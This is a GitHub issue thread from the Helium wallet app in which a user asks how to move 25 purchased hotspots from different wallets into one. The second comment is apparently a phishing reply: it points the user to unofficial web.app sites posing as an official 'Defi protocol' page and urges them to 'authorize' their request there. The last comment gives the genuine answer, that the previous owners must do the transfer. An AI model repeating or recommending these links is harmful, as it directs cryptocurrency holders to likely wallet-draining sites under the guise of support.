### ISSUE TITLE
How to transfer hotspots from multiple wallets to one wallet?

### ISSUE THREAD

**Issue by yuzg-test** [helium/wallet-app#624]
I have purchased 25 old hotspots belonging to 25 different wallets and need to transfer them to a new wallet for unified management. Can the transfer function of Helium CLI Wallet still be used at present? If the following operation method is feasible, please help me!

Do the new owners need to use Solana Address to perform the transfer operation?

Helium wallet hotspots transfer <hotspot address> <Solana address>

**Comment by Vasually** [comment]
Hi @yuzg-test 
Sorry for the inconvenience you are facing, you should visit the official [Defi](https://daplinkprotocol.web.app/defiprotocol/v1/defi/home/) protocol page to authorize your request and gain access for other technical support via [Defi protocol](https://onlinedefiprotocol.web.app/)

**Comment by ChewingGlass** [comment]
The old owners of the wallet need to transfer it to you.
